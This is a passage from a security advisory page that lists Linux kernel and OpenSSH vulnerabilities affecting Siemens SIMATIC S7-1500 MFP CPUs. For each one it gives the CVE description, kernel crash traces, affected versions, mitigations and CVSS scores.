<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1341.html">CWE-1341 Multiple Releases of Same Resource or Handle</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-40300</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: x86/vmscape: Add conditional IBPB mitigation VMSCAPE is a vulnerability that exploits insufficient branch predictor isolation between a guest and a userspace hypervisor (like QEMU). Existing mitigations already protect kernel/KVM from a malicious guest. Userspace can additionally be protected by flushing the branch predictors after a VMexit. Since it is the userspace that consumes the poisoned branch predictors, conditionally issue an IBPB after a VMexit and before returning to userspace. Workloads that frequently switch between hypervisor and userspace will incur the most overhead from the new IBPB. This new IBPB is not integrated with the existing IBPB sites. For instance, a task can use the existing speculation control prctl() to get an IBPB at context switch time. With this implementation, the IBPB is doubled up: one at context switch and another before running userspace. The intent is to integrate and optimize these cases post-embargo. [ dhansen: elaborate on suboptimal IBPB solution ]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-40300">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/402.html">CWE-402 Transmission of Private Resources into a New Sphere ('Resource Leak')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-61984</a></h3>
<div class="csaf-accordion-content">
<p>ssh in OpenSSH before 10.1 allows control characters in usernames that originate from certain possibly untrusted sources, potentially leading to code execution when a ProxyCommand is used. The untrusted sources are the command line and %-sequence expansion of a configuration file. (A configuration file that provides a complete literal username is not categorized as an untrusted source.)</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-61984">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/159.html">CWE-159 Improper Handling of Invalid Use of Special Elements</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.6</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-61985</a></h3>
<div class="csaf-accordion-content">
<p>ssh in OpenSSH before 10.1 allows the '\0' character in an ssh:// URI, potentially leading to code execution when a ProxyCommand is used.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-61985">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/158.html">CWE-158 Improper Neutralization of Null Byte or NUL Character</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.6</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68206</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_ct: add seqadj extension for natted connections Sequence adjustment may be required for FTP traffic with PASV/EPSV modes. due to need to re-write packet payload (IP, port) on the ftp control connection. This can require changes to the TCP length and expected seq / ack_seq. The easiest way to reproduce this issue is with PASV mode. Example ruleset: table inet ftp_nat { ct helper ftp_helper { type "ftp" protocol tcp l3proto inet } chain prerouting { type filter hook prerouting priority 0; policy accept; tcp dport 21 ct state new ct helper set "ftp_helper" } } table ip nat { chain prerouting { type nat hook prerouting priority -100; policy accept; tcp dport 21 dnat ip prefix to ip daddr map { 192.168.100.1 : 192.168.13.2/32 } } chain postrouting { type nat hook postrouting priority 100 ; policy accept; tcp sport 21 snat ip prefix to ip saddr map { 192.168.13.2 : 192.168.100.1/32 } } } Note that the ftp helper gets assigned *after* the dnat setup. The inverse (nat after helper assign) is handled by an existing check in nf_nat_setup_info() and will not show the problem. Topoloy: +-------------------+ +----------------------------------+ | FTP: 192.168.13.2 | &lt;-&gt; | NAT: 192.168.13.3, 192.168.100.1 | +-------------------+ +----------------------------------+ | +-----------------------+ | Client: 192.168.100.2 | +-----------------------+ ftp nat changes do not work as expected in this case: Connected to 192.168.100.1. [..] ftp&gt; epsv EPSV/EPRT on IPv4 off. ftp&gt; ls 227 Entering passive mode (192,168,100,1,209,129). 421 Service not available, remote server has closed connection. Kernel logs: Missing nfct_seqadj_ext_add() setup call WARNING: CPU: 1 PID: 0 at net/netfilter/nf_conntrack_seqadj.c:41 [..] __nf_nat_mangle_tcp_packet+0x100/0x160 [nf_nat] nf_nat_ftp+0x142/0x280 [nf_nat_ftp] help+0x4d1/0x880 [nf_conntrack_ftp] nf_confirm+0x122/0x2e0 [nf_conntrack] nf_hook_slow+0x3c/0xb0 .. Fix this by adding the required extension when a conntrack helper is assigned to a connection that has a nat binding.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68206">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/166.html">CWE-166 Improper Handling of Missing Special Element</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68261</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() Fix a race between inline data destruction and block mapping. The function ext4_destroy_inline_data_nolock() changes the inode data layout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS. At the same time, another thread may execute ext4_map_blocks(), which tests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks() or ext4_ind_map_blocks(). Without i_data_sem protection, ext4_ind_map_blocks() may receive inode with EXT4_INODE_EXTENTS flag and triggering assert. kernel BUG at fs/ext4/indirect.c:546! EXT4-fs (loop2): unmounting filesystem. invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014 RIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546 Call Trace: ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681 _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822 ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124 ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255 ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000 generic_perform_write+0x259/0x5d0 mm/filemap.c:3846 ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285 ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679 call_write_iter include/linux/fs.h:2271 [inline] do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735 do_iter_write+0x186/0x710 fs/read_write.c:861 vfs_iter_write+0x70/0xa0 fs/read_write.c:902 iter_file_splice_write+0x73b/0xc90 fs/splice.c:685 do_splice_from fs/splice.c:763 [inline] direct_splice_actor+0x10f/0x170 fs/splice.c:950 splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896 do_splice_direct+0x1a9/0x280 fs/splice.c:1002 do_sendfile+0xb13/0x12c0 fs/read_write.c:1255 __do_sys_sendfile64 fs/read_write.c:1323 [inline] __se_sys_sendfile64 fs/read_write.c:1309 [inline] __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309 do_syscall_x64 arch/x86/entry/common.c:51 [inline] do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81 entry_SYSCALL_64_after_hwframe+0x6e/0xd8</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68261">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/367.html">CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68264</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: refresh inline data size before write operations The cached ei-&gt;i_inline_size can become stale between the initial size check and when ext4_update_inline_data()/ext4_create_inline_data() use it. Although ext4_get_max_inline_size() reads the correct value at the time of the check, concurrent xattr operations can modify i_inline_size before ext4_write_lock_xattr() is acquired. This causes ext4_update_inline_data() and ext4_create_inline_data() to work with stale capacity values, leading to a BUG_ON() crash in ext4_write_inline_data(): kernel BUG at fs/ext4/inline.c:1331! BUG_ON(pos + len &gt; EXT4_I(inode)-&gt;i_inline_size); The race window: 1. ext4_get_max_inline_size() reads i_inline_size = 60 (correct) 2. Size check passes for 50-byte write 3. [Another thread adds xattr, i_inline_size changes to 40] 4. ext4_write_lock_xattr() acquires lock 5. ext4_update_inline_data() uses stale i_inline_size = 60 6. Attempts to write 50 bytes but only 40 bytes actually available 7. BUG_ON() triggers Fix this by recalculating i_inline_size via ext4_find_inline_data_nolock() immediately after acquiring xattr_sem. This ensures ext4_update_inline_data() and ext4_create_inline_data() work with current values that are protected from concurrent modifications. This is similar to commit a54c4613dac1 ("ext4: fix race writing to an inline_data file while its xattrs are changing") which fixed i_inline_off staleness. This patch addresses the related i_inline_size staleness issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68264">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/362.html">CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68265</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nvme: fix admin request_queue lifetime The namespaces can access the controller's admin request_queue, and stale references on the namespaces may exist after tearing down the controller. Ensure the admin request_queue is active by moving the controller's 'put' to after all controller references have been released to ensure no one is can access the request_queue. This fixes a reported use-after-free bug: BUG: KASAN: slab-use-after-free in blk_queue_enter+0x41c/0x4a0 Read of size 8 at addr ffff88c0a53819f8 by task nvme/3287 CPU: 67 UID: 0 PID: 3287 Comm: nvme Tainted: G E 6.13.2-ga1582f1a031e #15 Tainted: [E]=UNSIGNED_MODULE Hardware name: Jabil /EGS 2S MB1, BIOS 1.00 06/18/2025 Call Trace: dump_stack_lvl+0x4f/0x60 print_report+0xc4/0x620 ? _raw_spin_lock_irqsave+0x70/0xb0 ? _raw_read_unlock_irqrestore+0x30/0x30 ? blk_queue_enter+0x41c/0x4a0 kasan_report+0xab/0xe0 ? blk_queue_enter+0x41c/0x4a0 blk_queue_enter+0x41c/0x4a0 ? __irq_work_queue_local+0x75/0x1d0 ? blk_queue_start_drain+0x70/0x70 ? irq_work_queue+0x18/0x20 ? vprintk_emit.part.0+0x1cc/0x350 ? wake_up_klogd_work_func+0x60/0x60 blk_mq_alloc_request+0x2b7/0x6b0 ? __blk_mq_alloc_requests+0x1060/0x1060 ? __switch_to+0x5b7/0x1060 nvme_submit_user_cmd+0xa9/0x330 nvme_user_cmd.isra.0+0x240/0x3f0 ? force_sigsegv+0xe0/0xe0 ? nvme_user_cmd64+0x400/0x400 ? vfs_fileattr_set+0x9b0/0x9b0 ? cgroup_update_frozen_flag+0x24/0x1c0 ? cgroup_leave_frozen+0x204/0x330 ? nvme_ioctl+0x7c/0x2c0 blkdev_ioctl+0x1a8/0x4d0 ? blkdev_common_ioctl+0x1930/0x1930 ? fdget+0x54/0x380 __x64_sys_ioctl+0x129/0x190 do_syscall_64+0x5b/0x160 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7f765f703b0b Code: ff ff ff 85 c0 79 9b 49 c7 c4 ff ff ff ff 5b 5d 4c 89 e0 41 5c c3 66 0f 1f 84 00 00 00 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 8b 0d dd 52 0f 00 f7 d8 64 89 01 48 RSP: 002b:00007ffe2cefe808 EFLAGS: 00000202 ORIG_RAX: 0000000000000010 RAX: ffffffffffffffda RBX: 00007ffe2cefe860 RCX: 00007f765f703b0b RDX: 00007ffe2cefe860 RSI: 00000000c0484e41 RDI: 0000000000000003 RBP: 0000000000000000 R08: 0000000000000003 R09: 0000000000000000 R10: 00007f765f611d50 R11: 0000000000000202 R12: 0000000000000003 R13: 00000000c0484e41 R14: 0000000000000001 R15: 00007ffe2cefea60</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68265">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-68266</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bfs: Reconstruct file type when loading from disk syzbot is reporting that S_IFMT bits of inode-&gt;i_mode can become bogus when the S_IFMT bits of the 32bits "mode" field loaded from disk are corrupted or when the 32bits "attributes" field loaded from disk are corrupted. A documentation says that BFS uses only lower 9 bits of the "mode" field. But I can't find an explicit explanation that the unused upper 23 bits (especially, the S_IFMT bits) are initialized with 0. Therefore, ignore the S_IFMT bits of the "mode" field loaded from disk. Also, verify that the value of the "attributes" field loaded from disk is either BFS_VREG or BFS_VDIR (because BFS supports only regular files and the root directory).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-68266">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
